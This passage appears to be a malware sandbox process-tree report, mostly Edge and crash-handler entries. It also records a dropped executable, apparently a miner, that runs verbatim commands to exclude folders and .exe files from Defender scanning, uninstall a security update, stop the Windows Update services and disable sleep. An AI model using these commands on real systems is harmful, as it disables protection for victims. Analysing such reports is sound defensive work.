  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,3870347070700220903,1746737846073306803,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5004 /prefetch:1
  2⤵
  PID:4220
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,3870347070700220903,1746737846073306803,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5036 /prefetch:1
  2⤵
  PID:2140
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2032,3870347070700220903,1746737846073306803,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4460 /prefetch:8
  2⤵
  PID:3368
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2032,3870347070700220903,1746737846073306803,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4460 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3972
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,3870347070700220903,1746737846073306803,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5132 /prefetch:1
  2⤵
  PID:3088
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,3870347070700220903,1746737846073306803,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5448 /prefetch:1
  2⤵
  PID:3244
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2032,3870347070700220903,1746737846073306803,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5144 /prefetch:8
  2⤵
  PID:1732
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2032,3870347070700220903,1746737846073306803,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5300 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  PID:2236
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,3870347070700220903,1746737846073306803,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5336 /prefetch:1
  2⤵
  PID:5228
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,3870347070700220903,1746737846073306803,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5412 /prefetch:1
  2⤵
  PID:5456
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,3870347070700220903,1746737846073306803,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5220 /prefetch:1
  2⤵
  PID:5468
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,3870347070700220903,1746737846073306803,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5664 /prefetch:1
  2⤵
  PID:5772
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,3870347070700220903,1746737846073306803,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5736 /prefetch:1
  2⤵
  PID:6020
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,3870347070700220903,1746737846073306803,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4196 /prefetch:1
  2⤵
  PID:6004
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,3870347070700220903,1746737846073306803,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5672 /prefetch:1
  2⤵
  PID:5004
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,3870347070700220903,1746737846073306803,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5088 /prefetch:1
  2⤵
  PID:748
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,3870347070700220903,1746737846073306803,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4840 /prefetch:1
  2⤵
  PID:5328
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,3870347070700220903,1746737846073306803,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2116 /prefetch:1
  2⤵
  PID:1100
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,3870347070700220903,1746737846073306803,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6448 /prefetch:1
  2⤵
  PID:232
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,3870347070700220903,1746737846073306803,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4276 /prefetch:1
  2⤵
  PID:5840
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,3870347070700220903,1746737846073306803,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6852 /prefetch:1
  2⤵
  PID:3572
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,3870347070700220903,1746737846073306803,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5552 /prefetch:1
  2⤵
  PID:3520
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,3870347070700220903,1746737846073306803,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5492 /prefetch:1
  2⤵
  PID:4080
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,3870347070700220903,1746737846073306803,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6748 /prefetch:1
  2⤵
  PID:3392
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2032,3870347070700220903,1746737846073306803,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=7008 /prefetch:2
  2⤵
  PID:5612
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,3870347070700220903,1746737846073306803,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6916 /prefetch:1
  2⤵
  PID:5008
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,3870347070700220903,1746737846073306803,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7128 /prefetch:1
  2⤵
  PID:6136
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2032,3870347070700220903,1746737846073306803,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5988 /prefetch:8
  2⤵
  PID:3856
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2032,3870347070700220903,1746737846073306803,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5356 /prefetch:2
  2⤵
  PID:2824
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,3870347070700220903,1746737846073306803,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6644 /prefetch:1
  2⤵
  PID:1812

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3252

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2332

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 1648 -ip 1648
1⤵
PID:4164

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 2204 -ip 2204
1⤵
PID:5340

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 2204 -ip 2204
1⤵
PID:4880

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 368 -p 2204 -ip 2204
1⤵
PID:4008

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 2204 -ip 2204
1⤵
PID:5644

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 2204 -ip 2204
1⤵
PID:5312

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 2204 -ip 2204
1⤵
PID:5680

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 2204 -ip 2204
1⤵
PID:5752

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2204 -ip 2204
1⤵
PID:5876

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2204 -ip 2204
1⤵
PID:2600

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2204 -ip 2204
1⤵
PID:5984

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5968 -ip 5968
1⤵
PID:5032

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 5968 -ip 5968
1⤵
PID:3244

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 5968 -ip 5968
1⤵
PID:4336

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 5968 -ip 5968
1⤵
PID:3456

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 5968 -ip 5968
1⤵
PID:5648

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 5968 -ip 5968
1⤵
PID:5660

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5968 -ip 5968
1⤵
PID:1464

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5968 -ip 5968
1⤵
PID:5860

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 368 -p 5968 -ip 5968
1⤵
PID:4420

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5968 -ip 5968
1⤵
PID:5892

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 5968 -ip 5968
1⤵
PID:5920

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 5968 -ip 5968
1⤵
PID:5992

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 5968 -ip 5968
1⤵
PID:5336

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 5968 -ip 5968
1⤵
PID:6080

C:\ProgramData\cwsdjtkixutq\kuytqawknxye.exe
C:\ProgramData\cwsdjtkixutq\kuytqawknxye.exe
1⤵
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:672
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3476
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:5288
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:4440
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:5624
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:5224
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:5628
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:6128
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:5292
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:1044
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:5404
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:6004
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:2528
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:5704
- C:\Windows\system32\dwm.exe
  dwm.exe
  2⤵
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5856

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x508 0x46c
1⤵
PID:3432

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 5968 -ip 5968
1⤵
PID:5728

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2824

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5064

C:\Users\Admin\AppData\Local\Temp\3086a343d2\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\3086a343d2\Hkbsse.exe
1⤵
- Executes dropped EXE
PID:3464
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 3464 -s 444
  2⤵
  - Program crash
  PID:5828

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 396 -p 3464 -ip 3464
1⤵
PID:1812

C:\Users\Admin\AppData\Local\Temp\3086a343d2\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\3086a343d2\Hkbsse.exe
1⤵
- Executes dropped EXE
PID:5380
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 444
  2⤵
  - Program crash
  PID:216

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 5380 -ip 5380
1⤵
PID:232

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 5968 -ip 5968
1⤵
PID:5824

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 5968 -ip 5968
1⤵
PID:3212

C:\Users\Admin\AppData\Local\Temp\3086a343d2\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\3086a343d2\Hkbsse.exe
1⤵
- Executes dropped EXE
PID:772
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 772 -s 444
  2⤵
  - Program crash
  PID:2616

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 772 -ip 772
1⤵
PID:1892

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5968 -ip 5968
1⤵
PID:3232

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 5968 -ip 5968
1⤵
PID:2468

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 5968 -ip 5968
1⤵
PID:5304

C:\Users\Admin\AppData\Local\Temp\3086a343d2\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\3086a343d2\Hkbsse.exe
1⤵
- Executes dropped EXE
PID:212
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 212 -s 444
  2⤵
  - Program crash
  PID:2944

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 212 -ip 212
1⤵
PID:4476

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 5968 -ip 5968
1⤵
PID:1628

C:\Users\Admin\AppData\Local\Temp\3086a343d2\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\3086a343d2\Hkbsse.exe
1⤵
- Executes dropped EXE
PID:1268
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 1268 -s 444
  2⤵
  - Program crash
  PID:6004

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 1268 -ip 1268
1⤵
PID:2300

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5968 -ip 5968
1⤵
PID:180

C:\Users\Admin\AppData\Local\Temp\3086a343d2\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\3086a343d2\Hkbsse.exe
1⤵
- Executes dropped EXE
PID:3684
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 3684 -s 448
  2⤵
  - Program crash
  PID:5524

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 3684 -ip 3684
1⤵
PID:5164

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 5968 -ip 5968
1⤵
PID:5632

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 5968 -ip 5968
1⤵
PID:5056

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 5968 -ip 5968
1⤵
PID:3024

C:\Users\Admin\AppData\Local\Temp\3086a343d2\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\3086a343d2\Hkbsse.exe
1⤵
- Executes dropped EXE
PID:2628
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 2628 -s 448
  2⤵
  - Program crash
  PID:3932

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 2628 -ip 2628
1⤵
PID:2676

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 5968 -ip 5968
1⤵
PID:3452

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 5968 -ip 5968
1⤵
PID:6136

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 396 -p 5968 -ip 5968
1⤵
PID:1512

C:\Users\Admin\AppData\Local\Temp\3086a343d2\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\3086a343d2\Hkbsse.exe
1⤵
- Executes dropped EXE
PID:1196
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 1196 -s 444
  2⤵
  - Program crash
  PID:5320

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 1196 -ip 1196
1⤵
PID:5736

C:\Users\Admin\AppData\Local\Temp\3086a343d2\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\3086a343d2\Hkbsse.exe
1⤵
- Executes dropped EXE
PID:1872
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 1872 -s 452
  2⤵
  - Program crash
  PID:752

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 1872 -ip 1872
1⤵
PID:4320

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 5968 -ip 5968
1⤵
PID:4904

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 5968 -ip 5968
1⤵
PID:2444

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 5968 -ip 5968
1⤵
PID:2196

C:\Users\Admin\AppData\Local\Temp\3086a343d2\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\3086a343d2\Hkbsse.exe
1⤵
- Executes dropped EXE
PID:5692
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 5692 -s 444
  2⤵
  - Program crash
  PID:3476

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 5692 -ip 5692
1⤵
PID:1832

C:\Users\Admin\AppData\Local\Temp\3086a343d2\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\3086a343d2\Hkbsse.exe
1⤵
- Executes dropped EXE
PID:4448
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4448 -s 444
  2⤵
  - Program crash
  PID:5288

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 4448 -ip 4448
1⤵
PID:428

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 5968 -ip 5968
1⤵
PID:3964

C:\Users\Admin\AppData\Local\Temp\3086a343d2\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\3086a343d2\Hkbsse.exe
1⤵
- Executes dropped EXE
PID:2460
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 2460 -s 444
  2⤵
  - Program crash
  PID:372

C:\Windows\SysWOW64\WerFault.exe
